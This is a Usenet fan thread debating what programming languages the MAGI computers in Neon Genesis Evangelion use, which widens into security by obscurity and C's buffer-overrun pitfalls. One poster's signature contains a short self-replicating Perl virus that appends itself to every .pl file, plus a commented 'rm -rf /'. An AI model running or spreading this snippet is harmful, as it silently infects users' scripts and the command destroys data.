Which programming languages in NGE?
Rudolf Polzer
(indentation after { and }, but not fully readable) and something
HTML-like:
<head>MAGI-system 1 MELCHIOR</head>
<body><a>31415926535
(more digits of pi follow).
Interesting: <a> in HTML is invalid, as is <head> with plaintext in it.
It could be XML (at least the visible code is not invalid XML). Did XML
aready exist in 1995?
Also DOS2k15 was visible (that's how I call it - see earlier postings).
What other sightings of this sort are there?
--
#!/usr/bin/perl -- WARNING: Be careful. This is a virus!!! # rm -rf /
eval($0=q{$0="\neval(\$0=q{$0});\n";for(<*.pl>){open X,">>$_";print X
$0;close X;}print''.reverse"\nsuriv lreP trohs rehtona tsuJ>RH<\n"});
####################### http://learn.to/quote #######################
Disaster
> In episode 13 I saw already two different languages: something C-like
> (indentation after { and }, but not fully readable) and something
> HTML-like:
>
> <head>MAGI-system 1 MELCHIOR</head>
> <body><a>31415926535
>
> (more digits of pi follow).
>
> Interesting: <a> in HTML is invalid, as is <head> with plaintext in it.
> It could be XML (at least the visible code is not invalid XML). Did XML
> aready exist in 1995?
>
> Also DOS2k15 was visible (that's how I call it - see earlier postings).
>
> What other sightings of this sort are there?
The question is not what was around in 95, but what is around in 2015.
Just because it looks like C and html doesn't mean it's either or even a
hybrid system. We are dealing with a system that functions more like a
super fast human mind after all. I doubt any programming language used
today would be utilized anyhow for security reasons if nothing else.
--
Kind regards
Disaster
Disaster's Fan Fiction - http://www.disfanfic.net
JAE FAQ - http://www.evafaq.com
Pen^3's JAE FAQ - http://faq.pen3.cjb.net
Rudolf Polzer
> "Rudolf Polzer" <AntiATFiel...@durchnull.de> wrote:
> > In episode 13 I saw already two different languages: something C-like
> > (indentation after { and }, but not fully readable) and something
> > HTML-like:
> >
> > <head>MAGI-system 1 MELCHIOR</head>
> > <body><a>31415926535
> >
> > (more digits of pi follow).
> >
> > Interesting: <a> in HTML is invalid, as is <head> with plaintext in it.
> > It could be XML (at least the visible code is not invalid XML). Did XML
> > aready exist in 1995?
> >
> > Also DOS2k15 was visible (that's how I call it - see earlier postings).
> >
> > What other sightings of this sort are there?
>
> The question is not what was around in 95, but what is around in 2015.
> Just because it looks like C and html doesn't mean it's either or even a
> hybrid system. We are dealing with a system that functions more like a
> super fast human mind after all.
That's why I wondered why it looks like current programming languages.
When was MAGI built again? Somewhere I read 2004 to 2010, so it's not
unrealistic that the control terminals do support "current" programming
languages; once you start a project, you won't change the programming
language too often.
> I doubt any programming language used today would be utilized anyhow
> for security reasons if nothing else.
Let's say instead "no programming language will stay as is until 2015".
There *will* be C-like languages, there *will* be XML-like things. But
probably both C and the current XML will disappear.
BTW: I just googled for MAGI and found:
| Linux Cluster MAGI (p3 of 6)
[...]
| Hardware
|
| Each of 8 nodes consists of:
^
New record? The one I saw before had 4 nodes.
Disaster
So? That just means that they started with a different language.
> > I doubt any programming language used today would be utilized anyhow
> > for security reasons if nothing else.
>
> Let's say instead "no programming language will stay as is until 2015".
> There *will* be C-like languages, there *will* be XML-like things. But
> probably both C and the current XML will disappear.
No, lets just say what I just said instead of saying something else.
> BTW: I just googled for MAGI and found:
>
> | Linux Cluster MAGI
(p3 of 6)
> [...]
> | Hardware
> |
> | Each of 8 nodes consists of:
> ^
> New record? The one I saw before had 4 nodes.
.... What?
Rudolf Polzer
> "Rudolf Polzer" <AntiATFiel...@durchnull.de> wrote:
> > Scripsit illa aut ille Disaster <disa...@disfanfic.net>:
> > > "Rudolf Polzer" <AntiATFiel...@durchnull.de> wrote:
> > > > What other sightings of this sort are there?
> > >
> > > The question is not what was around in 95, but what is around in 2015.
> > > Just because it looks like C and html doesn't mean it's either or even a
> > > hybrid system. We are dealing with a system that functions more like a
> > > super fast human mind after all.
> >
> > That's why I wondered why it looks like current programming languages.
> > When was MAGI built again? Somewhere I read 2004 to 2010, so it's not
> > unrealistic that the control terminals do support "current" programming
> > languages; once you start a project, you won't change the programming
> > language too often.
>
> So? That just means that they started with a different language.
In 2004 there won't be many different languages from what we know now.
Especially if you think about they won't use a language for which there
isn't even one working and well optimizing compiler.
If you want to create a supercomputer, you won't start with designing a
programming language. You'll start with thinking about what language you
might use, what processor's features you could use in order to optimize
and which other architecture details might help.
> > > I doubt any programming language used today would be utilized anyhow
> > > for security reasons if nothing else.
> >
> > Let's say instead "no programming language will stay as is until 2015".
> > There *will* be C-like languages, there *will* be XML-like things. But
> > probably both C and the current XML will disappear.
>
> No, lets just say what I just said instead of saying something else.
Why? C is not every language. And C is the only of today's languages I
would like seeing disappearing because it caused too many security
holes (buffer overrun).
OK, Nicolas Wirth's Pascal will stay as is: useless, but still there.
C++ also has the chance to stay until 2015, as well as BASIC.
> > BTW: I just googled for MAGI and found:
> >
> > | Linux Cluster MAGI
> (p3 of 6)
> > [...]
> > | Hardware
> > |
> > | Each of 8 nodes consists of:
> > ^
> > New record? The one I saw before had 4 nodes.
>
> .... What?
The first MAGI on the Top500 list is on rank 56, and that's the only
one. It has 1040 processors.
But I do not find the URL of the 4-node one any more.
Disaster
Well, to start, are you aware of every programming language in the world
today? Do you know if there are any programs that are secret and that you
have not been made aware of, because they are secret? It's perfectly
plausible that the MAGI use their own language especially as they have
very special and unique processors.
> > > > I doubt any programming language used today would be utilized
anyhow
> > > > for security reasons if nothing else.
> > >
> > > Let's say instead "no programming language will stay as is until
2015".
> > > There *will* be C-like languages, there *will* be XML-like things.
But
> > > probably both C and the current XML will disappear.
> >
> > No, lets just say what I just said instead of saying something else.
>
> Why? C is not every language. And C is the only of today's languages I
> would like seeing disappearing because it caused too many security
> holes (buffer overrun).
>
> OK, Nicolas Wirth's Pascal will stay as is: useless, but still there.
> C++ also has the chance to stay until 2015, as well as BASIC.
So what? I say that the MAGI use there own language. Why? Because you
can't determine which they use for sure and they are very unique and
specialized units.
> > > BTW: I just googled for MAGI and found:
> > >
> > > | Linux Cluster
MAGI
> > (p3 of 6)
> > > [...]
> > > | Hardware
> > > |
> > > | Each of 8 nodes consists of:
> > > ^
> > > New record? The one I saw before had 4 nodes.
> >
> > .... What?
>
> The first MAGI on the Top500 list is on rank 56, and that's the only
> one. It has 1040 processors.
>
> But I do not find the URL of the 4-node one any more.
..... I don't know what the hell you are talking about!
GearType2
"Rudolf Polzer" <AntiATFiel...@durchnull.de> wrote in message
news:slrnahrqs6.r51.Ant...@www42.durchnull.de...
> In episode 13 I saw already two different languages: something C-like
> (indentation after { and }, but not fully readable) and something
> HTML-like:
>
> <head>MAGI-system 1 MELCHIOR</head>
> <body><a>31415926535
>
> (more digits of pi follow).
>
> Interesting: <a> in HTML is invalid, as is <head> with plaintext in it.
> It could be XML (at least the visible code is not invalid XML). Did XML
> aready exist in 1995?
>
> Also DOS2k15 was visible (that's how I call it - see earlier postings).
>
> What other sightings of this sort are there?
Personally I doubt they did much research on programming langauges. I think
they decided to take what looked like a language and prop it up there. Lots
of animes do this(think of all those ones that show giant mathmatic
equations... it's all garble)
Rudolf Polzer
> "Rudolf Polzer" <AntiATFiel...@durchnull.de> wrote:
> > In 2004 there won't be many different languages from what we know now.
> > Especially if you think about they won't use a language for which there
> > isn't even one working and well optimizing compiler.
> >
> > If you want to create a supercomputer, you won't start with designing a
> > programming language. You'll start with thinking about what language you
> > might use, what processor's features you could use in order to optimize
> > and which other architecture details might help.
>
> Well, to start, are you aware of every programming language in the world
> today?
No, but I am aware that the language used on the control terminal is a
C-like language. It uses {, } and indentation exactly like they are used
in current C, so syntactically it is a language derived from C. Of
course there might be differences, probably (or better: surely) another
library, some syntactic extensions, but mostly it is a "C-like language"
(as is C++, C#, Java, JavaScript).
> Do you know if there are any programs that are secret and that you
> have not been made aware of, because they are secret?
There's no reason for a programming language to be secret.
> It's perfectly plausible that the MAGI use their own language
> especially as they have very special and unique processors.
If you call it an own language because some small things (like the
library or some keywords) have changed: Yes.
> > OK, Nicolas Wirth's Pascal will stay as is: useless, but still there.
> > C++ also has the chance to stay until 2015, as well as BASIC.
>
> So what? I say that the MAGI use there own language. Why? Because you
> can't determine which they use for sure and they are very unique and
> specialized units.
Probably not really "an own language". It seems more like a language
derived from a current one.
If you design a new language that is not derived from a current one, you
won't find programmers learning it. But if it looks like C or Pascal
(and has similar semantics), they will do it. A big project like MAGI
cannot be done if the programmers first have to learn a completely new
programming language. Of course MAGI does not have a straightforward
control flow, many routines can run at one time - but that should not
hinder programmers who already know fork() and multithreading - but of
course the MAGI features for this are even more powerful.
Also, I do not think MAGI is programmed in the language displayed on the
control terminals. Probably there is no "programming language" for MAGI
since MAGI is not a computer like you are sitting in front of. It's got
an I/O interface to receive commands and/or questions in some query
language and control terminals to create such queries. Those control
terminals do have macro languages, and that's what is visible on the
screen.
Rudolf Polzer
>
> "Rudolf Polzer" <AntiATFiel...@durchnull.de> wrote in message
> news:slrnahrqs6.r51.Ant...@www42.durchnull.de...
> > In episode 13 I saw already two different languages: something C-like
> > (indentation after { and }, but not fully readable) and something
> > HTML-like:
> >
> > <head>MAGI-system 1 MELCHIOR</head>
> > <body><a>31415926535
> >
> > (more digits of pi follow).
> >
> > Interesting: <a> in HTML is invalid, as is <head> with plaintext in it.
> > It could be XML (at least the visible code is not invalid XML). Did XML
> > aready exist in 1995?
> >
> > Also DOS2k15 was visible (that's how I call it - see earlier postings).
> >
> > What other sightings of this sort are there?
>
> Personally I doubt they did much research on programming langauges.
Not much.
> I think they decided to take what looked like a language and prop it
> up there. Lots of animes do this(think of all those ones that show
> giant mathmatic equations... it's all garble)
At least the digits of pi are correct...
I just wanted to know if there are more places where such things occur.
Disaster
> Scripsit illa aut ille Disaster <disa...@disfanfic.net>:
> > "Rudolf Polzer" <AntiATFiel...@durchnull.de> wrote:
> > > In 2004 there won't be many different languages from what we know
now.
> > > Especially if you think about they won't use a language for which
there
> > > isn't even one working and well optimizing compiler.
> > >
> > > If you want to create a supercomputer, you won't start with
designing a
> > > programming language. You'll start with thinking about what language
you
> > > might use, what processor's features you could use in order to
optimize
> > > and which other architecture details might help.
> >
> > Well, to start, are you aware of every programming language in the
world
> > today?
>
> No, but I am aware that the language used on the control terminal is a
> C-like language. It uses {, } and indentation exactly like they are used
> in current C, so syntactically it is a language derived from C. Of
> course there might be differences, probably (or better: surely) another
> library, some syntactic extensions, but mostly it is a "C-like language"
> (as is C++, C#, Java, JavaScript).
So the most that you know is that it looks like it has some similarities
to C.
> > Do you know if there are any programs that are secret and that you
> > have not been made aware of, because they are secret?
>
> There's no reason for a programming language to be secret.
The reason is not the important here. What is worth keeping secret in your
opinion is not a consideration to someone else who has made a secret code
because they felt that they needed to keep it secret. Heh, I bet that they
probably haven't even heard of you.
> > It's perfectly plausible that the MAGI use their own language
> > especially as they have very special and unique processors.
>
> If you call it an own language because some small things (like the
> library or some keywords) have changed: Yes.
No, I have no idea what is involved in a programming language, I just know
that the MAGI are very different to anything we have to day. Different
things talk and understand processes differently. This needs a language
suited to that. The MAGI run very unique activities too. A custom language
would not surprise me.
> > > OK, Nicolas Wirth's Pascal will stay as is: useless, but still
there.
> > > C++ also has the chance to stay until 2015, as well as BASIC.
> >
> > So what? I say that the MAGI use there own language. Why? Because you
> > can't determine which they use for sure and they are very unique and
> > specialized units.
>
> Probably not really "an own language". It seems more like a language
> derived from a current one.
An evolved entity is still it's own entity. That which is derived from C
is no longer C.
> If you design a new language that is not derived from a current one, you
> won't find programmers learning it.
Which is a good reason why NERV would use it in the first place.
> But if it looks like C or Pascal
> (and has similar semantics), they will do it.
Which would be a reason why they wouldn't do that!
> A big project like MAGI
> cannot be done if the programmers first have to learn a completely new
> programming language.
Of course it can! You just need to train them in the new language first.
> Of course MAGI does not have a straightforward
> control flow, many routines can run at one time - but that should not
> hinder programmers who already know fork() and multithreading - but of
> course the MAGI features for this are even more powerful.
Which apparently is not a factor in this discussion.
> Also, I do not think MAGI is programmed in the language displayed on the
> control terminals. Probably there is no "programming language" for MAGI
> since MAGI is not a computer like you are sitting in front of. It's got
> an I/O interface to receive commands and/or questions in some query
> language and control terminals to create such queries. Those control
> terminals do have macro languages, and that's what is visible on the
> screen.
Even your brain has a programming language. As the MAGI appear to have a
similar construction, it might be safe to say that the MAGI use a thought
process rather then a programming language, even if the interfaces with
the I/O's are managed with programming Languages custom designed to
interpret and talk with the thought process.
Rudolf Polzer
Correct. Look at the current C-like languages.
> > > Do you know if there are any programs that are secret and that you
> > > have not been made aware of, because they are secret?
> >
> > There's no reason for a programming language to be secret.
>
> The reason is not the important here. What is worth keeping secret in your
> opinion is not a consideration to someone else who has made a secret code
> because they felt that they needed to keep it secret. Heh, I bet that they
> probably haven't even heard of you.
Again: even if the programming language is secret, it is still readable
code (that's what a programming language is for). So anyone can read and
understand the program in the unknown language - all that's missing is a
compiler. But of course one can transform a source code in an unknown
langugage into a source code in a known one.
So if you see:
define f<integer> {x<integer>}
pow {x, 2} + 17 --> y<integer>
x * y --> f
define g<integer> {x<string>}
%% push &x
%% call atoi
%% mov &g, @result
you exactly know what f and g do.
Even this is understandable:
| :prime
| argv(0)->p
| !R 0
| ?Fx 2 sqrt(p) 1
| ?I = % p x 0
| ?E
| ??
| ??
| !R 1
| ??
|
| 1->x
| ?W1
| + x 1->x
| ?I prime(x)
| printf (""%d is a prime\n", x)
| ?!
| printf (""%d is not a prime\n", x)
| ??
| ??
|
| ?E
That's a programming language I invented for my calculator: an
easy-to-interpret, but hard-to-read language. But from what you see you
can conclude the meaning of every symbol.
So there is no point of having a secret programming language: as soon as
someone gets some source code written in it, the language is revealed,
and if nobody gets source written in it, he only has the description of
the language (not even a compiler) and cannot do any harm using it
(not more harm than using assembler).
> > > It's perfectly plausible that the MAGI use their own language
> > > especially as they have very special and unique processors.
> >
> > If you call it an own language because some small things (like the
> > library or some keywords) have changed: Yes.
>
> No, I have no idea what is involved in a programming language, I just know
> that the MAGI are very different to anything we have to day.
It is, and I did not say the visible thing was MAGI's programming
language. More like a macro language for the control terminals.
> Different
> things talk and understand processes differently. This needs a language
> suited to that. The MAGI run very unique activities too. A custom language
> would not surprise me.
A programming language suitable for MAGI cannot be structured like C,
because there is no real control flow. Especially it cannot look like C
(indentation).
> > > So what? I say that the MAGI use there own language. Why? Because you
> > > can't determine which they use for sure and they are very unique and
> > > specialized units.
> >
> > Probably not really "an own language". It seems more like a language
> > derived from a current one.
>
> An evolved entity is still it's own entity. That which is derived from C
> is no longer C.
Therefore C is not C because there are different standards about it:
K&R, ANSI C, ANSI C99.
> > If you design a new language that is not derived from a current one, you
> > won't find programmers learning it.
>
> Which is a good reason why NERV would use it in the first place.
Security by obscurity is no security concept at all. They aren't that
stupid.
Anyone can read the source of GPG, but did anyone break the encryption?
Nobody except MS knows the Internet Explorer source, but there are known
security holes?
> > A big project like MAGI
> > cannot be done if the programmers first have to learn a completely new
> > programming language.
>
> Of course it can! You just need to train them in the new language first.
That costs too much time.
> > Also, I do not think MAGI is programmed in the language displayed on the
> > control terminals. Probably there is no "programming language" for MAGI
> > since MAGI is not a computer like you are sitting in front of. It's got
> > an I/O interface to receive commands and/or questions in some query
> > language and control terminals to create such queries. Those control
> > terminals do have macro languages, and that's what is visible on the
> > screen.
>
> Even your brain has a programming language.
I forgot an adjective: imperative.
Disaster
similarities
> > to C.
>
> Correct. Look at the current C-like languages.
I'd rather not, those tend to give me headaches.
> > > > Do you know if there are any programs that are secret and that you
> > > > have not been made aware of, because they are secret?
> > >
> > > There's no reason for a programming language to be secret.
> >
> > The reason is not the important here. What is worth keeping secret in
your
> > opinion is not a consideration to someone else who has made a secret
code
> > because they felt that they needed to keep it secret. Heh, I bet that
they
> > probably haven't even heard of you.
>
> Again: even if the programming language is secret, it is still readable
> code (that's what a programming language is for). So anyone can read and
> understand the program in the unknown language - all that's missing is a
> compiler. But of course one can transform a source code in an unknown
> langugage into a source code in a known one.
>
> So if you see:
>
> define f<integer> {x<integer>}
> pow {x, 2} + 17 --> y<integer>
> x * y --> f
>
> define g<integer> {x<string>}
> %% push &x
> %% call atoi
> %% mov &g, @result
>
> you exactly know what f and g do.
Actually! I don't! I don't understand that at all.
> Even this is understandable:
>
[SNIP]
Not to me! :/
> That's a programming language I invented for my calculator: an
> easy-to-interpret, but hard-to-read language. But from what you see you
> can conclude the meaning of every symbol.
No I can't!
> So there is no point of having a secret programming language: as soon as
> someone gets some source code written in it, the language is revealed,
> and if nobody gets source written in it, he only has the description of
> the language (not even a compiler) and cannot do any harm using it
> (not more harm than using assembler).
Then don't let anyone get the source code!
> > > > It's perfectly plausible that the MAGI use their own language
> > > > especially as they have very special and unique processors.
> > >
> > > If you call it an own language because some small things (like the
> > > library or some keywords) have changed: Yes.
> >
> > No, I have no idea what is involved in a programming language, I just
know
> > that the MAGI are very different to anything we have to day.
>
> It is, and I did not say the visible thing was MAGI's programming
> language. More like a macro language for the control terminals.
Fine, I think I picked up on this later anyhow.
> > Different
> > things talk and understand processes differently. This needs a
language
> > suited to that. The MAGI run very unique activities too. A custom
language
> > would not surprise me.
>
> A programming language suitable for MAGI cannot be structured like C,
> because there is no real control flow. Especially it cannot look like C
> (indentation).
>
> > > > So what? I say that the MAGI use there own language. Why? Because
you
> > > > can't determine which they use for sure and they are very unique
and
> > > > specialized units.
> > >
> > > Probably not really "an own language". It seems more like a language
> > > derived from a current one.
> >
> > An evolved entity is still it's own entity. That which is derived from
C
> > is no longer C.
>
> Therefore C is not C because there are different standards about it:
> K&R, ANSI C, ANSI C99.
Well C is C. But something other then C is not C
> > > If you design a new language that is not derived from a current one,
you
> > > won't find programmers learning it.
> >
> > Which is a good reason why NERV would use it in the first place.
>
> Security by obscurity is no security concept at all. They aren't that
> stupid.
It is one concept. It is also a good concept! Sometimes necessary. I don't
know where you learnt otherwise but go beat the crap out of them.
> Anyone can read the source of GPG, but did anyone break the encryption?
> Nobody except MS knows the Internet Explorer source, but there are known
> security holes?
Well, what about those people who have stolen the source?
> > > A big project like MAGI
> > > cannot be done if the programmers first have to learn a completely
new
> > > programming language.
> >
> > Of course it can! You just need to train them in the new language
first.
>
> That costs too much time.
They had time!
David Scarlett
>> > But probably both C and the current XML will disappear.
What makes you think that? C has been around for over 30 years and is
still very much alive and kicking....
> And C is the only of today's
> languages I would like seeing disappearing because it caused too
> many security holes (buffer overrun).
Buffer overruns aren't caused by C. They're caused by incompetence.
People who don't know why gets() is dangerous shouldn't be using C...
--
David Scarlett
dscarlett [AT] optushome [DOT] com [DOT] au
Rudolf Polzer
> > So if you see:
> >
> > define f<integer> {x<integer>}
> > pow {x, 2} + 17 --> y<integer>
> > x * y --> f
> >
> > define g<integer> {x<string>}
> > %% push &x
> > %% call atoi
> > %% mov &g, @result
> >
> > you exactly know what f and g do.
>
> Actually! I don't! I don't understand that at all.
Probably you've never seen any programming language at all. Tenchi will
understand both (and be able to say both are useless) even if only
knowing Visual Basic.
> > So there is no point of having a secret programming language: as soon as
> > someone gets some source code written in it, the language is revealed,
> > and if nobody gets source written in it, he only has the description of
> > the language (not even a compiler) and cannot do any harm using it
> > (not more harm than using assembler).
>
> Then don't let anyone get the source code!
If nobody gets the source code, you can give out the language specs and
receive licensing fees.
But that's the problem: not giving out the language specs does not
increase security. Not giving out the source of your own programs might
increase it - probably it does not, because it is too easy to get it if
you really want it. You just need a good gun...
Look at ID Software. They give out the full source code for Quake 3 for
free. Only the game data files are what you pay for. But it does not do
any harm to ID Software to give out the source since a small group
cannot make a complete game out of it (the data files are the main
work) and the GPL must be inherited.
> > > An evolved entity is still it's own entity. That which is derived from C
> > > is no longer C.
> >
> > Therefore C is not C because there are different standards about it:
> > K&R, ANSI C, ANSI C99.
>
> Well C is C. But something other then C is not C
K&R C is not ANSI C99.
> > > > If you design a new language that is not derived from a current one, you
> > > > won't find programmers learning it.
> > >
> > > Which is a good reason why NERV would use it in the first place.
> >
> > Security by obscurity is no security concept at all. They aren't that
> > stupid.
>
> It is one concept. It is also a good concept! Sometimes necessary. I don't
> know where you learnt otherwise but go beat the crap out of them.
At least in cryptography it's really true.
- If you have a simple, crackable algorithm and do not tell anyone about
it, probably someone might be able to guess the algorithm.
- If you have a complicated, uncrackable algorithm, giving it out does
not do any harm to your security.
Especially one must never rely on nobody knowing the algorithm, and
exactly this is security by obscurity.
But now think about someone finding a bug in your program. If the source
is available, most probably they will send you a patch for it and then
publish the bug with the patch. So anyone (especially the script
kiddies) know the bug, but every admin can patch his version of the
program to remove the security hole. If the source is unavailable, the
bug will be published anyway - but without a patch. The time when script
kiddies can exploit it will be longer.
I just found
http://www-106.ibm.com/developerworks/security/library/s-obs.html?dwzone=security
- maybe that interests you.
> > Anyone can read the source of GPG, but did anyone break the encryption?
> > Nobody except MS knows the Internet Explorer source, but there are known
> > security holes?
>
> Well, what about those people who have stolen the source?
They are not the only ones to find security holes. Most holes are found
by those who have never seen the source - just by trying out some things
in JavaScript.
Especially, CodeRed used an approach that does not require seeing the
source - it does not even help with that! They just tried putting very
long strings into the URL and saw the program crashed. Then ran the
program in a debugger, looked what memory area was overwritten, changed
the bytes of the long string so that there is a pointer pointing to some
area in the long string at the place where the code wanted to return. So
they executed their own assembly code - without requiring the IIS source
even once. Most buffer overruns were found by Trial&Error.
> > > > A big project like MAGI
> > > > cannot be done if the programmers first have to learn a completely new
> > > > programming language.
> > >
> > > Of course it can! You just need to train them in the new language first.
> >
> > That costs too much time.
>
> They had time!
They could not know when the first Angel attacks.
At least that's how episode 01 sounds.
Rudolf Polzer
> Rudolf Polzer <AntiATFiel...@durchnull.de> wrote in
> news:slrnahtpg5.5i7.Ant...@www42.durchnull.de:
>
> >> > But probably both C and the current XML will disappear.
>
> What makes you think that? C has been around for over 30 years and is
> still very much alive and kicking....
C is undergoing too many changes. Three widely used standards.
C++ will have a better chance to stay, but I cannot really say C will
disappear. Most C++ compilers will stay being able to compile C since
this feature is not much to add to a C++ compiler. It's just that the
number of users of C will decrease to a small minority.
> > And C is the only of today's
> > languages I would like seeing disappearing because it caused too
> > many security holes (buffer overrun).
>
> Buffer overruns aren't caused by C. They're caused by incompetence.
> People who don't know why gets() is dangerous shouldn't be using C...
That's what someone in de.comp.security.misc wrote (I hope you see the
mistake):
| char *ptr = malloc (strlen(source));
| if (!ptr) exit (EXIT_FAILURE);
| strcpy (ptr,source);
| /* Wer das nicht kann, sollte IMHO gar nicht C programmieren. */
(If you can't do this, you shouldn't use C)
It happens just too easily because C does not have a string datatype
that does these things for you.
A simple
#define stralloc(N) calloc ((N) + 1, 1)
(when using calloc, the string returned has zero length, so other
mistakes are avoided)
and this mistake would have gone. Why isn't that in <stdlib.h>?
Then there are no variable-length arrays on the stack. You cannot write
void f (unsigned int n)
{
char a[n];
/* ... */
}
Having to use malloc all the time is memory-leak-prone, especially
because there is no better exception handling than atexit() and
longjmp(). This would be another good thing for C:
void f (unsigned int n)
{
char *a = malloc (n);
do
{
/* ... */
for (/* ... */)
{
/* ... */
if (somethingstrangehappened)
return;
}
/* ... */
}
onreturn /* only executed when using return */
{
puts ("something strange happened");
}
onleave /* always executed after leaving the block, using return or
regularily */
{
free (a);
}
puts ("do block did not use return");
}
(onreturn/onleave should even work when exiting from the block using return
- I know this would be a hassle to implement, but in every return the
compiler knows the chain of onexit blocks to execute so it could compile
them as functions and call them like functions before generating the RET,
so it's still simpler than exception handling)
And gets() is not the only such function. sprintf, *scanf etc. are just
as dangerous and especially for sprintf there is no safe ANSI C
replacement - snprintf has been introduced in C99 which many programmers
avoid for compatibility to older compilers and the really safe asprintf
(using this you don't have to worry about buffer sizes, therefore you
cannot make a mistake using it) is a GNU extension, not even C99.
Another flaw is that 'unsigned' is a longer word than 'int', therefore
many programmers use signed integers where unsigned ones are correct.
Turbo Pascal did this right, 'integer' was longer than 'word'...
David Scarlett
> C is undergoing too many changes. Three widely used standards.
Eh? The majority use C90, with a minority using C99.... What's the
third?
> That's what someone in de.comp.security.misc wrote (I hope you see
> the mistake):
>
>| char *ptr = malloc (strlen(source));
>| if (!ptr) exit (EXIT_FAILURE);
>| strcpy (ptr,source);
>| /* Wer das nicht kann, sollte IMHO gar nicht C programmieren.
>| */
> (If you can't do this, you shouldn't use C)
Should be "malloc(strlen(source)+1)" and that conditional should be
"if (ptr == NULL)". It's not guaranteed that NULL pointers will be
represented the same as a 0. ;-)
> It happens just too easily because C does not have a string
> datatype that does these things for you.
>
> A simple
>
> #define stralloc(N) calloc ((N) + 1, 1)
>
> (when using calloc, the string returned has zero length, so other
> mistakes are avoided)
>
> and this mistake would have gone. Why isn't that in <stdlib.h>?
I really don't see much use for it... You call always use calloc
yourself without a macro, or make sure your string isn't printed
before something meaningfull is put in it, or even just declare it as
an array (with the length specified in the code) and limit how much
you put into it....
> Then there are no variable-length arrays on the stack. You cannot
> write
>
> void f (unsigned int n)
> {
> char a[n];
> /* ... */
> }
IIRC this was added to C99.....
> Having to use malloc all the time is memory-leak-prone, especially
> because there is no better exception handling than atexit() and
> longjmp(). This would be another good thing for C:
Well remember C was designed to write Unix in.... It's not meant to
be a very high level language, more of a portable assembly
language...
> And gets() is not the only such function. sprintf, *scanf etc. are
> just as dangerous and especially for sprintf there is no safe ANSI
> C replacement
How is sprintf dangerous? You know the length of the string you're
printing before the variables have been inserted, and you can control
the length each variable is displayed to.....
> Another flaw is that 'unsigned' is a longer word than 'int',
> therefore many programmers use signed integers where unsigned ones
> are correct. Turbo Pascal did this right, 'integer' was longer
> than 'word'...
LOL. Now they're just being lazy. :D
--
David Scarlett
Remove entryplug to reply via email.
Disaster
>
> Probably you've never seen any programming language at all. Tenchi will
> understand both (and be able to say both are useless) even if only
> knowing Visual Basic.
Nup, not really!
> > Then don't let anyone get the source code!
>
> If nobody gets the source code, you can give out the language specs and
> receive licensing fees.
Accept that NERV is not interested in making money! They are interested in
doing everything to keep the public unaware of the real story.
> > > Therefore C is not C because there are different standards about it:
> > > K&R, ANSI C, ANSI C99.
> >
> > Well C is C. But something other then C is not C
>
> K&R C is not ANSI C99.
...... Yeah? So in other words, C is C but something other then C is not
C! Like I said! This actually isn't a programming thing it applies to
everyday life as well. Same as saying an apple isn't an orange even though
they are both fruit. In this case you just have to imagine that oranges
evolved from apples.
> > > Security by obscurity is no security concept at all. They aren't
that
> > > stupid.
> >
> > It is one concept. It is also a good concept! Sometimes necessary. I
don't
> > know where you learnt otherwise but go beat the crap out of them.
>
> At least in cryptography it's really true.
>
> - If you have a simple, crackable algorithm and do not tell anyone about
> it, probably someone might be able to guess the algorithm.
> - If you have a complicated, uncrackable algorithm, giving it out does
> not do any harm to your security.
But keeping it secret helps!
> Especially one must never rely on nobody knowing the algorithm, and
> exactly this is security by obscurity.
Which is more of an option available to NERV, rather then an exclusive
plan.
> But now think about someone finding a bug in your program. If the source
> is available, most probably they will send you a patch for it and then
> publish the bug with the patch. So anyone (especially the script
> kiddies) know the bug, but every admin can patch his version of the
> program to remove the security hole. If the source is unavailable, the
> bug will be published anyway - but without a patch. The time when script
> kiddies can exploit it will be longer.
>
> I just found
>
http://www-106.ibm.com/developerworks/security/library/s-obs.html?dwzone=s
ecurity
> - maybe that interests you.
I think we are getting a little far a field here. I would love to read
that article but I have to go shortly.
> > They had time!
>
> They could not know when the first Angel attacks.
>
> At least that's how episode 01 sounds.
They still had to build the Eva's and the MAGI for that matter. Regardless
of what they knew, things were gonna take some time!
Rudolf Polzer
> >
> > If nobody gets the source code, you can give out the language specs and
> > receive licensing fees.
>
> Accept that NERV is not interested in making money! They are interested in
> doing everything to keep the public unaware of the real story.
The public can know about MAGI without problems. There are other things
the public must not understand (how the EVAs work for example).
>
> > > > Therefore C is not C because there are different standards about it:
> > > > K&R, ANSI C, ANSI C99.
> > >
> > > Well C is C. But something other then C is not C
> >
> > K&R C is not ANSI C99.
>
> ...... Yeah? So in other words, C is C but something other then C is not
> C!
No. All three are called "C".
> > - If you have a simple, crackable algorithm and do not tell anyone about
> > it, probably someone might be able to guess the algorithm.
> > - If you have a complicated, uncrackable algorithm, giving it out does
> > not do any harm to your security.
>
> But keeping it secret helps!
Especially in this field: no. You'd get better reports about bugs in the
algorithm (they will be in the public and not on some hacker sites).
That makes it far easier to fix the problem or to warn everyone who
relied on the encryption if it is not considered safe anymore.
> > Especially one must never rely on nobody knowing the algorithm, and
> > exactly this is security by obscurity.
>
> Which is more of an option available to NERV, rather then an exclusive
> plan.
It does not work. NERV does not have able competitors (they can't really
hide anything from SEELE, and everyone else does not have the means). It
would not do any harm to give out such things - but it also wouldn't be
of any use.
> > > They had time!
> >
> > They could not know when the first Angel attacks.
> >
> > At least that's how episode 01 sounds.
>
> They still had to build the Eva's and the MAGI for that matter. Regardless
> of what they knew, things were gonna take some time!
Every possibility to speed up had to be taken.
Disaster
> the public must not understand (how the EVAs work for example).
No, the MAGI are secret systems. they are just as protected as the Eva's.
> > > K&R C is not ANSI C99.
> >
> > ...... Yeah? So in other words, C is C but something other then C is
not
> > C!
>
> No. All three are called "C".
Well I'm not the idiot who wrote them and named them then.
> > But keeping it secret helps!
>
> Especially in this field: no. You'd get better reports about bugs in the
> algorithm (they will be in the public and not on some hacker sites).
> That makes it far easier to fix the problem or to warn everyone who
> relied on the encryption if it is not considered safe anymore.
The whole idea is that you never let it leak out that you even have this
system. Then you encrypt it and do everything you can to protect it. You
can't shoot what you don't know is even there!
> > Which is more of an option available to NERV, rather then an exclusive
> > plan.
>
> It does not work. NERV does not have able competitors (they can't really
> hide anything from SEELE, and everyone else does not have the means). It
> would not do any harm to give out such things - but it also wouldn't be
> of any use.
Ummm, they do hide things from SEELE actually. Gendo does anyhow and he
uses the MAGI to do it with. But that's another issue.
> > They still had to build the Eva's and the MAGI for that matter.
Regardless
> > of what they knew, things were gonna take some time!
>
> Every possibility to speed up had to be taken.
Yeah but they still new that it was gonna be years before they could put
something like this together properly.